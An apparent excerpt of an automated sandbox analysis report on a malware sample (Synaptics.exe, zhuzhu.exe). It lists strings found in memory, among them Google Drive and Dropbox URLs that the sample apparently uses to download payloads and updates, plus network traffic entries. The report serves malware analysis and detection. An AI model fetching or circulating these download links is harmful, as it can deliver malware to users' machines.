                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsers
                                      Source: Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsn
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadst
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000710C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsx
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt-
                                      Source: Synaptics.exe, 00000002.00000003.1775678113.000000000064C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt.net
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt1
                                      Source: Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt8
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtM&
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadte
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadted
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadth_Yj
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtiPKB_o
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtion-
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtleni
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadts
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtubec
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000065D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu-
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu2
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadud
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadurHJZ
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadurce.
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadus;
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.000000000064C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadute.
                                      Source: Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2535106563.000000001CFC6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2482309150.000000000E5CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000710C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv6
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv=
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadveY
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.00000000005DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadviGc
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvn
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2531561375.000000001CEF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx1
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx6c
                                      Source: Synaptics.exe, 00000002.00000002.2505301533.0000000015E3E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxM
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxsMXG
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000065D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady1
                                      Source: Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady9
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady:
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady=w_#
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.000000000710C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor.
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor..
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor..yy
                                      Source: Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyp
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2535106563.000000001CFC6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2482309150.000000000E5CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.00000000070A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz-
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzjE
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzz
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2482309150.000000000E5CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
                                      Source: zhuzhu.exe, 00000000.00000003.1670210944.00000000026B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                                      Source: zhuzhu.exe, 00000000.00000003.1670210944.00000000026B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                                      Source: Synaptics.exe, 00000002.00000003.1744249799.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmp, zhuzhu.exe, ~DF163C59614BB26FC3.TMP.3.dr, ~$cache1.2.dr, Synaptics.exe.0.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                                      Source: Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
                                      Source: Synaptics.exe, 00000002.00000002.2482309150.000000000E5CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.a
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2535106563.000000001CFC6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1770138974.000000000543D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2528045833.000000001CE63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/N=
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/dK
                                      Source: Synaptics.exe, 00000002.00000002.2528045833.000000001CE63000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E63D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2535106563.000000001CF9F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.00000000005F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.00000000005DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ04
                                      Source: Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPragma:
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV%
                                      Source: Synaptics.exe, 00000002.00000002.2483669386.000000000E63F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                                      Source: Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcH
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
                                      Source: Synaptics.exe, 00000002.00000002.2528045833.000000001CE63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                                      Source: zhuzhu.exe, 00000000.00000003.1670210944.00000000026B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=
                                      Source: Synaptics.exe, 00000002.00000003.1744249799.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmp, zhuzhu.exe, ~$cache1.2.dr, Synaptics.exe.0.drString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                                      Source: Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
                                      Source: Synaptics.exe, 00000002.00000003.1744249799.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmp, zhuzhu.exe, ~$cache1.2.dr, Synaptics.exe.0.drString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                                      Source: Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
                                      Source: zhuzhu.exe, 00000000.00000003.1670210944.00000000026B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlX
                                      Source: Synaptics.exe, 00000002.00000003.1744249799.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmp, zhuzhu.exe, ~DF163C59614BB26FC3.TMP.3.dr, ~$cache1.2.dr, Synaptics.exe.0.drString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                                      Source: Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
                                      Source: ._cache_zhuzhu.exe, 00000001.00000003.1771155564.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000002.1773595012.0000000000B64000.00000004.00000020.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000003.1771077383.0000000000B65000.00000004.00000020.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000002.1779229502.0000000005DCB000.00000004.00000010.00020000.00000000.sdmp, inst.exe, 00000007.00000003.1803411074.0000000003BAC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 00000007.00000003.1803199164.0000000003D3D000.00000004.00000020.00020000.00000000.sdmp, sites.dll.7.dr, 360P2SP.dll.7.drString found in binary or memory: https://www.globalsign.com/repository/0
                                      Source: zhuzhu.exe, 00000000.00000000.1657356123.00000000004A5000.00000002.00000001.01000000.00000003.sdmp, zhuzhu.exe, 00000000.00000003.1666861585.00000000067FE000.00000004.00000020.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000000.1663851009.0000000000401000.00000020.00000001.01000000.00000005.sdmp, ._cache_zhuzhu.exe.1.dr, ._cache_zhuzhu.exe.0.dr, Synaptics.exe.0.drString found in binary or memory: https://www.incredibuild.com
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
